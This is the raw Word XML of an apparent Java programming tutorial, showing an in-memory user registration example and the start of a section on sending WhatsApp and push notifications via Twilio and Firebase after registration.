    <w:p w14:paraId="1158B58A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13391F04"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1167928E"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Us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D6E0A9B"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username</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1199BEEB"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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523DF258"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8703EB"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User</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user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passwor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FAE2211"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user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username</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465DBBE5"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passwor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assword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FE123E"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20E8406"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EBE087"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getUser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11168BE"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username</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC28B9"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5E32A09"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0532B"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getPasswor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1135F6D"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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40CB63"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3C7794C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3685147A"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2A6F6B2E"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to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F6F9BE8"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User{usernam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user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passwor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asswor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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BCBEBD"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EEE3FFD"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051992E6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412527B2"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UserRepository</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9709C99"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n-memory storage for registered users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0034779F"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p</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Us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userRepo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Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DDC0A9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1135128D"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Register a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C157687"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registerUser</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user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passwor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E70E193"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heck if the user already exists in the repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A97A5"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serRep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ntainsKe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ser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EE88D94"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User with username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user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already exists."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C2B52"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User already exists, registration failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E66F0B5"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E2D3CC5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28815CDC"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Register the new user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D4312D"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User</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> newUs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Us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ser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assword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F493D"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userRep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ser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ewUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2059845A"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User registered successfully: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ewUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25372659"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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC6D9E8"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AA26E41"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C6656"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heck if a user is available in the repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9EF052"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isUserAvailable</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user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5765607"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userRep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ntainsKe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ser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Returns true if user exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF1505"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E664FCA"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060FAC3D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F47F3"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i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687FA0F"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99107E9"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UserRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> userRepo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UserRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE95628"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119AEE36"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Register users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB15180"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userRep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gisterUser</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john_do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password123"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50908B11"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userRep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gisterUser</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jane_do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password456"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5433F6D9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6891BD58"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heck if users are available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A19C2FE"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Is john_doe available?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userRep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UserAvailabl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john_doe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095A64F1"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Is alice_smith available?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userRep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sUserAvailabl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lice_smith"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF1CC8" w14:textId="77777777"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7564A66" w14:textId="03EC3133" w:rsidR="00AB1E17" w:rsidRPr="00CE4B95"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22D69C5D" w14:textId="77777777" w:rsidR="00AB1E17" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB1E17" w:rsidP="00AB1E17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8A043A" w14:textId="459E324B" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="380" w:name="_Toc196307860"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="008A0829" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>WhatsApp notification and mobile notification example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="380"/>
    </w:p>
    <w:p w14:paraId="4CD11CBB" w14:textId="7D3DE8A3" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="00B94A4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00751ED2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>How can you handle WhatsApp notification and mobile notification after user registration?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D480ED9" w14:textId="7AF7790C" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181B007F" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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Overview of Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEBD43" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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hatsApp Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DF9BDE" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Twilio API</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WhatsApp Business API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send WhatsApp messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286B5609" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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wilio provides a service for WhatsApp message sending that can be integrated with your backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D06E90" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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obile Push Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E553E" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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For mobile notifications, you can use services like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Firebase Cloud Messaging (FCM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send push notifications to both Android and iOS devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F88F794" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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rebase Cloud Messaging</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a free service by Google, which allows you to send notifications to your app's users based on various triggers, such as user registration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648EAA40" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00521BB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2F8CB8">
          <v:rect id="_x0000_i1897" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50265003" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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ep-by-Step Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8591B" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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WhatsApp Notification (Using Twilio API):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF4EBA" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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o send a WhatsApp notification, you will need to integrate the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Twilio API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DC2151" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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eps for WhatsApp Notification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F701E9" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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reate a Twilio Account</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and set up the WhatsApp API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5911072F" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Get the Account SID</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Auth Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Twilio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D711C" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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nd WhatsApp Messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after user registration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF94A9E" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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wilio API Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB04439" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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First, you need to add Twilio’s Java SDK to your project. You can add it via </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maven</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494DF531"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5074884"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC43782"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50748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lt;groupId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>com.twilio</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589266D8"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50748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lt;artifactId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>twilio</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03804689"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507488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lt;version&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8.16.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14385193" w14:textId="241EE32B"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5074884"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E698854" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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de to Send WhatsApp Notification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3645F4"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co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wilio</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Twilio</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732664EC"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co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wili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p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v201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ccoun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Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FAB649"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co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wili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ype</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PhoneNumber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
